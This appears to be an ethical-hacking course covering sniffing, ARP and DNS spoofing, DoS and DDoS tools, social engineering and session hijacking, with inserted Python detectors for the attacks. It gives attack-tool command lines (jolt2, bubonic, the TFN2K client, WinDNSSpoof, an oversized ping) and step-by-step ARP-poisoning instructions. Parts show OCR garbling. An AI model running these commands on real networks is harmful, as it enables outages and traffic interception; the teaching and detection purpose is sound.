19:56:53.506528 IP (tos 0x88, ttl 43, id 46881, len 510) 64.4.26.250.80 > 192.168.2.69.2446: P 894239202:894239672(470) ack 4229117801 win 17520
19:56:53.508241 IP (tos 0x88, ttl 43, id 46882, len 576) 64.4.26.250.80 > 192.168.2.69.2446: . 894239672:894240208(536) ack 4229117801 win 17520
19:56:53.508465 IP (tos 0x0, ttl 128, id 19205, len 40) 192.168.2.69.2446 > 64.4.26.250.80: . [tcp sum ok] 4229117801:4229117801(0) ack 894240208 win 16514 (DF)
19:56:53.508602 IP (tos 0x88, ttl 43, id 46883, len 106) 64.4.26.250.80 > 192.168.2.69.2446: . 894240208:894240274(66) ack 4229117801 win 17520
19:56:53.527161 IP (tos 0x88, ttl 107, id 30218, len 1500) 68.58.11.235.2824 > 192.168.2.69.2443: . 47592813:47594273(1460) ack 4228398193 win 8359 (DF)
19:56:53.538245 IP (tos 0x88, ttl 106, id 58657, len 108) 68.193.110.230.5000 > 192.168.2.162.5000: udp 80
19:56:53.580115 IP (tos 0x88, ttl 243, id 39962, len 40) 202.87.41.115.80 > 192.168.2.129.2549: F [tcp sum ok] 3461109112:3461109112(0) ack 6724698 win 8760 (DF)
Tool: EtherPeek

[Screenshot: EtherPeek. Warning: "Alarms will not function properly unless you enable Global Statistics Collection". Alarms table (Enabled / Suspect Condition / Problem Condition / Name): Average Utilization (Kbits/s) > 50000000 for 5 seconds / > 75000000 for 3 seconds; CRC Errors > 2 for 1 seconds / > 2 for 5 seconds; DECnet Addresses Seen; Duplicate Addresses; Errors Total; FTP Failed Transfers; Gin Attacks; ICMP Addr Mask Req; ICMP Dest Unreach; ICMP Frag Needed. Below it a log (Date / Time / Message) of HTTP requests observed on 06/23/2003 between 22:47:27 and 22:47:54, each recorded as the requested URL "from" the internal client address (192.168.2.50, 192.168.2.104, 192.168.2.129, 192.168.2.166)]
Passive Sniffing

Active Sniffing
Ether Flood

• Ether Flood floods a switched network with Ethernet frames with random hardware addresses.
• The effect on some switches is that they start sending all traffic out on all ports, so that the attacker is able to sniff all traffic on the network.
dsniff

• dsniff is a collection of tools for network auditing and penetration testing.

• dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.).

• arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g., due to layer-2 switching).

• sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKI.

ARP Spoofing

[Diagram: the attacker's machine sits between the victim and the default router; the numbered labels of the diagram are listed below in order]

1. Configure IP forwarding on the attacker's machine.

2. Send a fake ARP response to re-map the default router's IP to the attacker's MAC.

3. The victim sends traffic destined for the outside world based on the poisoned ARP table entry.

4. Sniff the traffic from the link.

5. Packets are forwarded from the attacker's machine to the actual default router for delivery to the outside world.

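The defender's counterpart to step 2 above is to watch ARP replies for a binding that changes. The following monitor is an added example, not code from the course or from any of the tools it lists; the replies, MAC addresses and the 10.0.0.0/24 hosts are constructed sample data.

```python
"""Passive detector for ARP cache poisoning.

Added example, not part of the course material: the monitor remembers the
first IP-to-MAC binding it sees for each host and alerts when a later ARP
reply claims a different MAC for the same IP (step 2 of the attack above),
or when an operator-pinned address such as the default gateway is announced
by any MAC other than the pinned one. The replies below are constructed
sample data.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional


@dataclass(frozen=True)
class ArpReply:
    """The fields of an ARP reply that matter for poisoning detection."""
    sender_ip: str
    sender_mac: str
    target_ip: str


class ArpWatcher:
    def __init__(self, pinned: Optional[Dict[str, str]] = None) -> None:
        # Operator-pinned bindings (e.g. the gateway) are trusted over anything learned.
        self.pinned = {ip: mac.lower() for ip, mac in (pinned or {}).items()}
        self.learned: Dict[str, str] = {}

    def observe(self, reply: ArpReply) -> Optional[str]:
        """Return an alert for a suspicious reply, or None when it is consistent."""
        ip, mac = reply.sender_ip, reply.sender_mac.lower()
        if ip in self.pinned:
            if mac != self.pinned[ip]:
                return (f"ALERT pinned host {ip} announced by {mac} "
                        f"(expected {self.pinned[ip]}) in a reply to {reply.target_ip}")
            return None
        known = self.learned.get(ip)
        if known is None:
            self.learned[ip] = mac          # first sighting: learn the binding
            return None
        if known != mac:
            # A NIC replacement or DHCP address reuse also changes a MAC, so
            # treat this as a lead to verify, not proof of an attack.
            return f"ALERT {ip} changed from {known} to {mac} in a reply to {reply.target_ip}"
        return None


def scan(replies: Iterable[ArpReply], pinned: Optional[Dict[str, str]] = None) -> List[str]:
    """Run every reply through one watcher and collect the alerts in order."""
    watcher = ArpWatcher(pinned)
    alerts = []
    for reply in replies:
        alert = watcher.observe(reply)
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample: 10.0.0.1 is the real gateway. The third reply carries a
# different MAC claiming the gateway's IP; later a workstation's MAC also flips.
SAMPLE = [
    ArpReply("10.0.0.1",  "aa:aa:aa:aa:aa:01", "10.0.0.50"),
    ArpReply("10.0.0.50", "aa:aa:aa:aa:aa:50", "10.0.0.1"),
    ArpReply("10.0.0.1",  "cc:cc:cc:cc:cc:99", "10.0.0.50"),   # gateway re-mapped
    ArpReply("10.0.0.50", "aa:aa:aa:aa:aa:50", "10.0.0.1"),
    ArpReply("10.0.0.77", "aa:aa:aa:aa:aa:77", "10.0.0.50"),
    ArpReply("10.0.0.77", "cc:cc:cc:cc:cc:99", "10.0.0.50"),   # second binding flips
]

if __name__ == "__main__":
    for line in scan(SAMPLE, pinned={"10.0.0.1": "aa:aa:aa:aa:aa:01"}):
        print(line)
```

Pinning the gateway is what makes the first alert fire on the very first forged reply; without a pin the monitor can only report that the binding changed.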



Sniffing HTTPS and SSH

• An SSL connection uses a session key to encrypt all data sent by server and client.

• SSH is based on the public key encryption idea.

• With SSH, a session key is transmitted in an encrypted fashion using a public key stored on the server.

• As such, these protocols, SSL and SSH, are sound from a security standpoint. The problem, however, lies in the basis of these protocols, namely trust in certificates and public keys.

Macof, MailSnarf

[Screenshot: Konsole window showing macof output, a stream of TCP SYN segments with random source and destination MAC addresses, 0.0.0.0 as source and destination IP, random port numbers and window size 512]

• Macof floods the local network with random MAC addresses, causing some switches to fail open in repeating mode, and thereby facilitates sniffing.

• Mailsnarf is capable of capturing and outputting SMTP mail traffic that is sniffed on the network.

• urlsnarf is a neat tool for monitoring Web traffic.

• Webspy allows the user to see all the web pages visited by the victim.




Ettercap

[Screenshot: Windows command prompt running ettercap 0.6.7 (c) 2002 ALoR & NaGA; the tool lists the available devices (dev1 to dev7), then the hosts found in the LAN, then its help window]

ettercap 0.6.7 help window:

[qQ|F10] - quit
[return] - select the IP
[space]  - deselect the IPs
[tab]    - switch between source and dest
[aA]     - ARP poisoning based sniffing
           . for sniffing on switched LAN
           . for man-in-the-middle technique
[sS]     - IP based sniffing
[mM]     - MAC based sniffing
[jJ]     - Only poisoning - no sniffing
[dD]     - delete an entry from the list
[xX]     - Packet Forge
[pP]     - run a plugin
[fF]     - OS fingerprint
[oO]     - passive host identification
[cC]     - check for other poisoner...
[rR]     - refresh the list
[kK]     - save host list to a file
[hH]     - this help screen

SMAC

[Screenshot: SMAC 1.1 (KLC Consulting, Inc., www.klcconsulting.net/smac) listing a network adapter with its ID, Active / Spoofed status, NDIS 5.0 driver, IP address and active MAC address, with fields for a new spoofed MAC address and Update MAC / Refresh / Remove MAC / Exit buttons]

Mac Changer

• MAC changer is a Linux utility for setting a specific MAC address for a network interface.

• It enables the user to set the MAC address randomly. It allows specifying the MAC of another vendor or setting another MAC of the same vendor.

• The user can also set a MAC of the same kind (e.g., a wireless card).

• It offers a choice of vendor MAC list (more than 6200 items) to choose from.

Iris v3.1

[Screenshot: Iris v3.1 capture window with a packet list (No., MAC source addr, MAC dest. addr, Frame, Protocol) showing TCP NETBIOS-SSN traffic between two hosts and IPX broadcasts; the Packet Decoder tree expands the MAC header (destination, source, type 08-00 DoD IP) and the IPv4 header (version 4, header length 5 (20 bytes), type of service, total length 40 bytes, identification, flags, don't fragment); below it the packet editor shows the hex dump of the selected packet, and the status bar shows the capturing host's IP and MAC]

NetIntercept

[Screenshot: NetIntercept forensics search view with Traffic / Summary / Forensics / Alerts / Views / Configuration tabs and selectable search criteria: SRC IP Address, DST IP Address, File Name, User Name, Content Type (Finger, Flash, FTP, FTP data, GIF, Gnutella, Gzip, HTML, HTTP, ...), a date/time range, Min Surety, saved queries and a Find Connections button]

DNS Sniffing and Spoofing

• DNS spoofing is said to have occurred when a DNS entry points to another IP instead of the legitimate IP address.

• When an attacker wants to poison a DNS cache, he will use a faulty DNS, which can be his own domain running a hacked DNS server. The DNS server is termed hacked because the IP address records are manipulated to suit the attacker's needs.

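Seen from the resolver, a poisoning attempt shows up as replies it never asked for, or as two answers for one query that disagree. The check below is an added example, not code from the course or from any tool on this page; the transaction IDs, names and addresses are constructed sample data.

```python
"""Resolver-side check for forged DNS replies.

Added example, not part of the course material: a resolver remembers each
query it sent by (transaction ID, name). A reply with no matching
outstanding query is unsolicited (the ID-guessing case), and a second reply
for an already-answered query that carries a different address means a
forged and a genuine reply raced each other. The detector cannot tell which
of the two was real; it only flags the conflict. All messages below are
constructed sample data using documentation address ranges.
"""
from typing import Dict, List, NamedTuple, Set, Tuple


class DnsMsg(NamedTuple):
    kind: str     # "query" or "response"
    txid: int     # 16-bit transaction ID: only 65536 values to guess from
    qname: str
    answer: str   # A record in the response; empty for queries


Key = Tuple[int, str]


class SpoofDetector:
    def __init__(self) -> None:
        self.outstanding: Set[Key] = set()
        self.answered: Dict[Key, str] = {}

    def handle(self, msg: DnsMsg) -> str:
        key = (msg.txid, msg.qname)
        if msg.kind == "query":
            self.outstanding.add(key)
            return "sent"
        if key in self.answered:
            if self.answered[key] != msg.answer:
                return f"CONFLICT {msg.qname}: {self.answered[key]} vs {msg.answer}"
            return "duplicate"
        if key not in self.outstanding:
            return f"UNSOLICITED {msg.qname} txid=0x{msg.txid:04x} -> {msg.answer}"
        self.outstanding.discard(key)
        self.answered[key] = msg.answer
        return "accepted"


def run(messages: List[DnsMsg]) -> List[str]:
    """Verdict for each message, in the order the messages were seen."""
    det = SpoofDetector()
    return [det.handle(m) for m in messages]


# Constructed sample: one clean lookup, one lookup where a forged reply wins
# the race and the genuine one arrives second, and one reply with no query.
SAMPLE = [
    DnsMsg("query",    0x1a2b, "www.example.net",   ""),
    DnsMsg("response", 0x1a2b, "www.example.net",   "203.0.113.10"),
    DnsMsg("query",    0x3c4d, "mail.example.net",  ""),
    DnsMsg("response", 0x3c4d, "mail.example.net",  "198.51.100.9"),   # forged, arrives first
    DnsMsg("response", 0x3c4d, "mail.example.net",  "203.0.113.25"),   # genuine, arrives second
    DnsMsg("response", 0x7777, "login.example.net", "198.51.100.9"),   # no query was ever sent
]

if __name__ == "__main__":
    for msg, verdict in zip(SAMPLE, run(SAMPLE)):
        print(f"{msg.kind:8} {msg.qname:18} {verdict}")
```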
WinDNSSpoof

• This tool is a simple DNS ID spoofer for Windows 9X/2K.

• In order to use it you must be able to sniff traffic of the computer being attacked.

• Usage: wds -h

  Example: wds -n www.microsoft.com -i 216.239.39.101 -g 00-00-39-5c-45-3b







Summary

• A sniffer is a piece of software that captures the traffic flowing into and out of a computer attached to a network.

• A sniffer attack is commonly used to grab logins and passwords that are traveling around on the network.

• Sniffing can be active or passive.

• Popular attack methods include man-in-the-middle attacks and session hijacking.

• On switched networks, MAC flooding and ARP spoofing are carried out.

Ethical Hacking

Module VIII
Denial Of Service

Module Objective

• What is a Denial Of Service Attack?
• What is a Distributed Denial Of Service Attack?
• Why are they difficult to protect against?
• Types of denial of service attacks
• Tools for running DOS attacks
• Tools for running DDOS attacks
• Denial of Service Countermeasures

It's Real

On February 6th, 2000, Yahoo portal was shut down for 3 hours. Then retailer Buy.com Inc. (BUYX) was hit the next day, hours after going public. By that evening, eBay (EBAY), Amazon.com (AMZN), and CNN (TWX) had gone dark. And in the morning, the mayhem continued with online broker E*Trade (EGRP) and others having traffic to their sites virtually choked off.

(Business Week Online, 12 February 2000)

What is a Denial Of Service Attack?

• A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it.

• If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack.

Types of denial of service attacks

• There are several general categories of DoS attacks.

• Popularly, the attacks are divided into three classes:

  • bandwidth attacks,
  • protocol attacks, and
  • logic attacks.

What are Distributed Denial of Service Attacks?

• An attacker launches the attack using several machines. In this case, an attacker breaks into several machines, or coordinates with several zombies, to launch an attack against a target or network at the same time.

• This makes it difficult to detect because attacks originate from several IP addresses.

• If a single IP address is attacking a company, it can block that address at its firewall. If it is 30000, this is extremely difficult.

Ping of Death

[Screenshot: Windows command prompt running "ping 192.168.20.180 -l 45500 -t", sending 45500-byte ICMP echo requests continuously and listing the replies]

• An attacker sends a large ping packet to the victim's machine. Most OSes do not know what to do with a packet that is larger than the maximum size; this causes the OS to hang or crash.

  Example: Ping of Death causes the blue screen of death in Windows NT.

• Ping of Death uses ICMP to cause a denial of service attack against a given system.




Hacking Tool: SSPing

• SSPing is a DoS tool.

• The SSPing program sends the victim's computer a series of highly fragmented, oversized ICMP data packets.

• The computer receiving the data packets locks when it tries to put the fragments together.

• The result is a memory overflow, which in turn causes the machine to stop responding.

• Affects Win 95/NT and Mac OS.

Hacking Tool: Land Exploit

• Land Exploit is a DoS attack in which a program sends a TCP SYN packet where the target and source addresses are the same and the port numbers are the same.

• When an attacker wants to attack a machine using the land exploit, he sends a packet in which the source/destination ports are the same.

• Most machines will crash or hang because they do not know how to handle it.

Hacking Tool: Smurf

• Smurf is a DoS attack involving forged ICMP packets sent to a broadcast address.

• Attackers spoof the source address on ICMP echo requests and send them to an IP broadcast address. This causes every machine on the broadcast network to receive it and respond back to the source address that was forged by the attacker.

1. An attacker sends an ICMP packet with a forged source address and the broadcast address as the destination.

2. All the machines on the segment receive the broadcast and reply to the forged source address.

3. This results in DoS due to high network traffic.

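Ping of Death, Land and Smurf (the three slides above) each leave a recognisable mark on a single packet, so a stateless filter or IDS rule can catch them before any state is kept. The classifier below is an added example, not course code and not a rule from any product named on this page; the packets are constructed sample records and the local segment is an assumed 192.0.2.0/24.

```python
"""Stateless checks for three classic malformed-packet DoS techniques.

Added example, not course code: tags an IP packet as Land (TCP SYN whose
source and destination address and port are identical), Smurf amplification
(ICMP echo request addressed to the local directed-broadcast address) or
Ping of Death (a fragment that would make the reassembled datagram exceed
the 65535-byte IPv4 maximum). Packets are constructed sample records, not
captures; the local network is an assumed /24.
"""
import ipaddress
from typing import List, NamedTuple, Optional, Tuple

IP_MAX_LEN = 65535   # largest IPv4 datagram, header included
IP_HDR_LEN = 20      # header without options; assumed for the reassembly bound


class Pkt(NamedTuple):
    src: str
    dst: str
    proto: str            # "tcp", "udp" or "icmp"
    sport: int = 0        # tcp/udp only
    dport: int = 0
    flags: str = ""       # tcp flags, e.g. "S" for SYN
    icmp_type: int = -1   # 8 = echo request
    frag_offset: int = 0  # payload offset in bytes (header field * 8)
    length: int = 0       # payload bytes carried by this packet/fragment


def classify(p: Pkt, local_net: ipaddress.IPv4Network) -> Optional[str]:
    """Return the technique the packet matches, or None for ordinary traffic."""
    if (p.proto == "tcp" and "S" in p.flags
            and p.src == p.dst and p.sport == p.dport):
        return "land"
    if (p.proto == "icmp" and p.icmp_type == 8
            and ipaddress.ip_address(p.dst) == local_net.broadcast_address):
        return "smurf"
    # Reassembly bound: header plus this fragment's end must fit in 65535 bytes.
    if IP_HDR_LEN + p.frag_offset + p.length > IP_MAX_LEN:
        return "ping-of-death"
    return None


def scan(packets: List[Pkt], local_net: str = "192.0.2.0/24") -> List[Tuple[int, str]]:
    """Index and label of every packet that matches one of the three patterns."""
    net = ipaddress.ip_network(local_net)
    hits = []
    for i, p in enumerate(packets):
        label = classify(p, net)
        if label:
            hits.append((i, label))
    return hits


# Constructed sample traffic on the assumed 192.0.2.0/24 segment.
SAMPLE = [
    Pkt("198.51.100.7", "192.0.2.10", "tcp", 40000, 80, "S"),                     # normal SYN
    Pkt("192.0.2.10", "192.0.2.10", "tcp", 139, 139, "S"),                        # land
    Pkt("203.0.113.5", "192.0.2.10", "icmp", icmp_type=8, length=56),             # normal ping
    Pkt("203.0.113.5", "192.0.2.255", "icmp", icmp_type=8, length=56),            # smurf request
    Pkt("203.0.113.5", "192.0.2.10", "icmp", icmp_type=8,
        frag_offset=65504, length=11),                                            # last legal fragment
    Pkt("203.0.113.5", "192.0.2.10", "icmp", icmp_type=8,
        frag_offset=65528, length=100),                                           # ping of death
]

if __name__ == "__main__":
    for idx, label in scan(SAMPLE):
        print(idx, label, SAMPLE[idx].src, "->", SAMPLE[idx].dst)
```

Disabling directed-broadcast forwarding on routers removes the Smurf amplifier entirely, which is why the request-to-broadcast check is the one worth alerting on at the border.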
SYN Flood

• A SYN attack floods a targeted system with a series of SYN packets.

• Each packet causes the targeted system to issue a SYN-ACK response. While the targeted system waits for the ACK that follows the SYN-ACK, it queues up all outstanding SYN-ACK responses on what is known as a backlog queue.

• SYN-ACKs are moved off the queue only when an ACK comes back or when an internal timer (which is set at relatively long intervals) terminates the TCP three-way handshake.

• Once the queue is full, the system will ignore all incoming SYN requests, making the system unavailable for legitimate users.

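The backlog queue, the completing ACK and the long timer described above can be modelled directly, which makes it plain why a handful of never-completed SYNs is enough to lock real clients out. This is an added example, not code from the course; the queue capacity, the 75-second timer and the event list are all constructed.

```python
"""Model of the listen backlog that a SYN flood exhausts.

Added example, not course code: a discrete-event model of a listening
socket's backlog. Each SYN occupies a slot until the peer's ACK completes
the handshake or the half-open timer expires; once every slot is held by a
SYN that will never be completed, later legitimate SYNs are dropped. The
capacity and timer are assumed parameters and the events are constructed
sample traffic from documentation address ranges.
"""
from typing import Dict, List, NamedTuple, Tuple


class Event(NamedTuple):
    t: float    # seconds since start of the capture
    src: str    # peer "ip:port"
    kind: str   # "SYN" opens a half-open entry, "ACK" completes it


class Backlog:
    def __init__(self, capacity: int, half_open_timeout: float) -> None:
        self.capacity = capacity
        self.timeout = half_open_timeout
        self.pending: Dict[str, float] = {}         # src -> time the entry expires
        self.established: List[str] = []
        self.dropped: List[Tuple[float, str]] = []  # SYNs ignored because the queue was full

    def _expire(self, now: float) -> None:
        """The internal timer: discard half-open entries that have waited too long."""
        for src in [s for s, exp in self.pending.items() if exp <= now]:
            del self.pending[src]

    def feed(self, ev: Event) -> None:
        self._expire(ev.t)
        if ev.kind == "SYN":
            if ev.src in self.pending:
                return                                # retransmitted SYN keeps its slot
            if len(self.pending) >= self.capacity:
                self.dropped.append((ev.t, ev.src))   # queue full: SYN is ignored
                return
            self.pending[ev.src] = ev.t + self.timeout
        elif ev.kind == "ACK" and ev.src in self.pending:
            del self.pending[ev.src]                  # handshake completed, slot freed
            self.established.append(ev.src)


def simulate(events: List[Event], capacity: int = 8,
             half_open_timeout: float = 75.0) -> Backlog:
    """Replay events in time order through a backlog of the given size."""
    backlog = Backlog(capacity, half_open_timeout)
    for ev in sorted(events, key=lambda e: e.t):
        backlog.feed(ev)
    return backlog


def constructed_traffic() -> List[Event]:
    """20 forged-source SYNs in the first second (never ACKed), then real clients."""
    events = [Event(0.05 * i, f"198.51.100.{i}:4{i:04d}", "SYN") for i in range(20)]
    events += [
        Event(2.0, "192.0.2.10:51000", "SYN"), Event(2.1, "192.0.2.10:51000", "ACK"),
        Event(3.0, "192.0.2.11:51001", "SYN"), Event(3.1, "192.0.2.11:51001", "ACK"),
        Event(80.0, "192.0.2.12:51002", "SYN"), Event(80.1, "192.0.2.12:51002", "ACK"),
    ]
    return events


if __name__ == "__main__":
    b = simulate(constructed_traffic())
    print("established:", b.established)
    print("dropped SYNs:", len(b.dropped), "of which from real clients:",
          sum(1 for _, s in b.dropped if s.startswith("192.0.2.")))
```

With eight slots the two clients arriving during the flood are dropped and only the one arriving after the timer expires gets through; SYN cookies avoid the problem by encoding the handshake state in the server's ISN instead of holding a slot.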
Hacking Tool: WinNuke

• WinNuke works by sending a packet with "Out of band" data to port 139 of the target host. First off, port 139 is the NetBIOS port and does not accept packets unless the OOB flag is set in the incoming packet.

• OOB stands for Out Of Band. When the victim's machine accepts this packet, it causes the computer to crash with a blue screen.

• Because the program accepting the packets does not know how to appropriately handle Out Of Band data, it crashes.

Hacking Tool: Jolt2

• Jolt2 enables users across different networks to send IP fragment-driven denial of service attacks against NT/2000 by making the victim's machine utilize 100% of its CPU when it attempts to process the illegal packets.

c:\> jolt2 1.2.3.4 -p 80 4.5.6.7

• The above command launches the attack from the attacker's machine with a spoofed IP address of 1.2.3.4 against the IP address 4.5.6.7.

• The victim's machine CPU resources reach 100%, causing the machine to lock up.

Hacking Tool: Bubonic.c

• Bubonic.c is a DOS exploit that can be run against Windows 2000 machines.

• It works by randomly sending TCP packets with random settings with the goal of increasing the load of the machine, so that it eventually crashes.

c:\> bubonic 12.23.23.2 10.0.0.1 100

Hacking Tool: Targa

• Targa is a program that can be used to run 8 different Denial Of Service attacks.

• The attacker has the option to either launch individual attacks or to try all the attacks until it is successful.

• Targa is a very powerful program and can do a lot of damage to a company's network.

Tools for running DDOS Attacks

• The main tools for running DDOS attacks are:

1. Trinoo
2. TFN
3. Stacheldraht
4. Shaft
5. TFN2K
6. mstream

[Diagram: a Master controlling Zombies that attack the Victim]

DDOS - Attack Sequence

[Diagram: the Attacker sends commands through Attack Relays to the victim site, whose Firewall, Router and Load-Balancer front the Web-Servers and a Backend-Server (e.g. Database)]

• All of the DDOS tools follow this sequence.

• Mass-intrusion Phase - automated tools identify potential systems with weaknesses; then root compromise them and install the DDOS software on them. These are the primary victims.

• DDOS Attack Phase - The compromised systems are used to run massive DOS against a victim site.

• Trinoo (trin00) was the first DDOS tool to be discovered.

• Found in the wild (binary form) on Solaris 2.x systems compromised by buffer overrun bugs in RPC services: statd, cmsd, ttdbserverd.

• Trinoo daemons were UDP based, password protected remote command shells running on compromised systems.

DDOS Structure

• The attacker controls one or more master servers by password protected remote command shells.

• The master systems control multiple daemon systems. Trinoo calls the daemons "Beast" hosts.

• Daemons fire packets at the target specified by the attacker.

Hacking Tool: Trinoo

• Trinoo is a DDOS attack tool. It uses the following ports:

  • Attacker to master: 27665/tcp
  • Master to daemon: 27444/udp
  • Daemon to master: 31335/udp

• Daemons reside on the systems that launch the attack, and masters control the daemon systems.

• Since Trinoo uses TCP, it can be easily detected and disabled.

• Could be thought of as 'son of trinoo'.

• Improved on some of the weaknesses of trinoo by adding different types of attacks that could be mounted against the victim site.

• Structured like trinoo with attackers, clients (masters) and daemons.

• Initial system compromise allows the TFN programs to be installed.




Hacking Tool: TFN2K

http://packetstorm.security.com/distributed

• TFN2K is a DDOS program which runs in distributed mode. There are two parts to the program: client and server.

• The server (also known as the zombie) runs on a machine in listening mode and waits for commands from the client.

  • Running the server

    td

  • Running the client

    tn -h 23.4.56.4 -c8 -i 56.3.4.5

• This command starts an attack from 23.4.56.4 to the victim's computer 56.3.4.5.

Hacking Tool: Stacheldraht

[Diagram: two Client nodes at the top of the Stacheldraht hierarchy]

• Stacheldraht combines the features of TFN and Trinoo but adds an encryption layer between daemons.

• Stacheldraht uses TCP and ICMP on the following ports:

  • Client to Handler: 16660 TCP
  • Handler to and from agents: 65000 ICMP

Preventing DoS Attacks

• You could do the following things to minimize the DoS attack:

1. Effective robust design
2. Bandwidth limitations
3. Keep systems patched
4. Run the least amount of services
5. Allow only necessary traffic
6. Block IP addresses

• Due to the power of DoS attacks and the way they work, there is nothing that can be done to prevent a DoS attack entirely.

Preventing the DDoS

1. Keep the network secure
2. Install IDS (Intrusion Detection System)
3. Use scanning tools
4. Run zombie tools

IDS pattern matching technologies have a database of signatures. When it finds packets that have a given pattern, it sets off an alarm.

Common IDS systems

1. Shareware
   • Snort
   • Shadow
   • Courtney

2. Commercial
   • ISS RealSecure
   • Axent NetProwler
   • Cisco Secure IDS (NetRanger)
   • Network Flight Recorder
   • Network Security Wizard's Dragon

Use Scanning Tools

• There are several tools available which could detect whether a system is being used as a DDOS server. The following tools can detect TFN2K, Trinoo and Stacheldraht.

• Find_DDOS
  • (http://ftp.cert.org.tw/tools/Security_Scanner/find_ddos/)

• SARA
  • (http://www.cromwell-intl.com/security/468-netaudit.html)

• DDoSPing v2.0
  • (http://is-it-true.org/pt/ptips19.shtml)

• RID
  • (http://staff.washington.edu/dittrich/misc/ddos/)

• ZombieZapper
  • (http://razor.bindview.com/tools/zombiezapper_form.shtml)

Summary

• Denial of Service is a very commonly used attack methodology.

• Distributed Denial Of Service using a multiplicity of zombie machines is an often seen attack methodology.

• There are various tools available for attackers to perpetrate DOS attacks.

• Protection against DOS is difficult due to the very nature of the attacks.

• Different scanning tools are available to aid detection and plugging of vulnerabilities leading to DOS.

Ethical Hacking

Module IX
Social Engineering

Module Objective

• What is Social Engineering?
• Common Types of Attacks
• Social Engineering by Phone
• Dumpster Diving
• Online Social Engineering
• Reverse Social Engineering
• Policies and Procedures
• Employee Education




0 Social Engineering is the human side of breaking into a 
corporate network. 

0 Companies with authentication processes, firewalls, 
virtual private networks and network monitoring 
software are sti 1 1 wi de open to attacks 

0 An employee may unwitti ngly give away key 

information in an email or by answering questions over 
the phone with someone they don't know or even by 
tal ki ng about a project with co workers at a local pub 
after hours. 
Art of Manipulation

• Social Engineering is the acquisition of sensitive information or inappropriate access privileges by an outsider, based upon building of inappropriate trust relationships with outsiders.

• The goal of a social engineer is to trick someone into providing valuable information or access to that information.

• It preys on qualities of human nature, such as the desire to be helpful, the tendency to trust people and the fear of getting in trouble.

Human Weakness

• People are usually the weakest link in the security chain.

• A successful defense depends on having good policies in place and educating employees to follow the policies.

• Social Engineering is the hardest form of attack to defend against because it cannot be defended with hardware or software alone.

Common Types of Social Engineering

• Social Engineering can be broken into two types: human based and computer based.

1. Human-based Social Engineering refers to person to person interaction to retrieve the desired information.

2. Computer-based Social Engineering refers to having computer software that attempts to retrieve the desired information.

Human based - Impersonation

Human based social engineering techniques can be broadly categorized into:

• Impersonation
• Posing as Important User
• Third-person Approach
• Technical Support
• In Person
  • Dumpster Diving
  • Shoulder Surfing

Example

A man calls a company help desk and says he's forgotten his password.

In a panic, he adds that if he misses the deadline on a big advertising project his boss might even fire him.

The help desk worker feels sorry for him and quickly resets the password - unwittingly giving the hacker clear entrance into the corporate network.

Example

A man is in back of the building loading the company's paper recycling bins into the back of a truck. Inside the bins are lists of employee titles and phone numbers, marketing plans and the latest company financials.

This information is sufficient to launch a social engineering attack on the company.

Computer Based Social Engineering

• These can be divided into the following broad categories:

  • Mail / IM attachments
  • Pop-up Windows
  • Websites / Sweepstakes
  • Spam Mail

[Screenshot: a mail client composing a message with the subject "Cool Photo of Anna Kournikova" and the body "How was your holidays? Please take a look at the censored Anna Kournikova image. Best regards."; beside it, a web form promising a bonus credit on an initial deposit that asks for the visitor's last name and birth date]

Reverse Social Engineering

• A more advanced method of gaining illicit information is known as "reverse social engineering".

• This is when the hacker creates a persona that appears to be in a position of authority, so that employees will ask him for information, rather than the other way around.

• The three parts of reverse social engineering attacks are sabotage, advertising and assisting.

Policies and Procedures

• Policy is the most critical component of any information security program.

• Good policies and procedures are not effective if they are not taught and reinforced to the employees.

• They need to be taught to emphasize their importance. After receiving training, the employee should sign a statement acknowledging that they understand the policies.

Security Policies - Checklist

• Account Setup
• Password change policy
• Help desk procedures
• Access Privileges
• Violations
• Employee identification
• Privacy Policy
• Paper documents
• Modems
• Physical Access Restrictions
• Virus control

Summary

• Social Engineering is the human side of breaking into a corporate network.

• Social Engineering involves acquiring sensitive information or inappropriate access privileges by an outsider.

• Human-based Social Engineering refers to person to person interaction to retrieve the desired information.

• Computer-based Social Engineering refers to having computer software that attempts to retrieve the desired information.

• A successful defense depends on having good policies in place and diligent implementation.

Ethical Hacking

Module X
Session Hijacking

Module Objective

• Spoofing vs Hijacking
• Types of session hijacking
• TCP/IP concepts
• Performing sequence prediction
• ACK Storms
• Session Hijacking Tools

Understanding session hijacking

• Understanding the flow of message packets over the Internet by dissecting the TCP stack.

• Understanding the security issues involved in the use of the IPv4 standard.

• Familiarizing with the basic attacks possible due to the IPv4 standard.

[Diagram: two hosts, each with Application, Transport, Network and Data Link layers; the peer layers share a Virtual Connection, while the Actual Connection runs through the hardware]

Spoofing vs Hijacking

A spoofing attack is different from a hijack in that an attacker is not actively taking another user offline to perform the attack; he pretends to be another user or machine to gain access.

Spoofing vs Hijacking

With hijacking, an attacker is taking over an existing session, which means he is relying on the legitimate user to make a connection and authenticate, then taking over the session.

[Diagram: the Attacker taking over the established session]




1 Tracki ng the 



session 



2. Desynchronizing 
the connection 

3. Injecting the 
attacl<er's pacl<et 
Types of session Hijacking

There are two types of hijacking attacks:

• Active
  • In an active attack, an attacker finds an active session and takes over.

• Passive
  • With a passive attack, an attacker hijacks a session, but sits back and watches and records all of the traffic that is being sent forth.

TCP Concepts 3 Way Handshake

1. Bob initiates a connection with the server. Bob sends a packet to the server with the SYN bit set.

2. The server receives this packet and sends back a packet with the SYN bit and an ISN (Initial Sequence Number) for the server.

3. Bob sets the ACK bit acknowledging the receipt of the packet and increments the sequence number by 1.

4. The two machines have successfully established a session.

Sequence Numbers

• Sequence numbers are very important to provide reliable communication, but they are also crucial to hijacking a session.

• Sequence numbers are a 32-bit counter, which means the value can be any of over 4 billion possible combinations.

• The sequence numbers are used to tell the receiving machine what order the packets should go in when they are received.

• Therefore an attacker must successfully guess the sequence number to hijack a session.
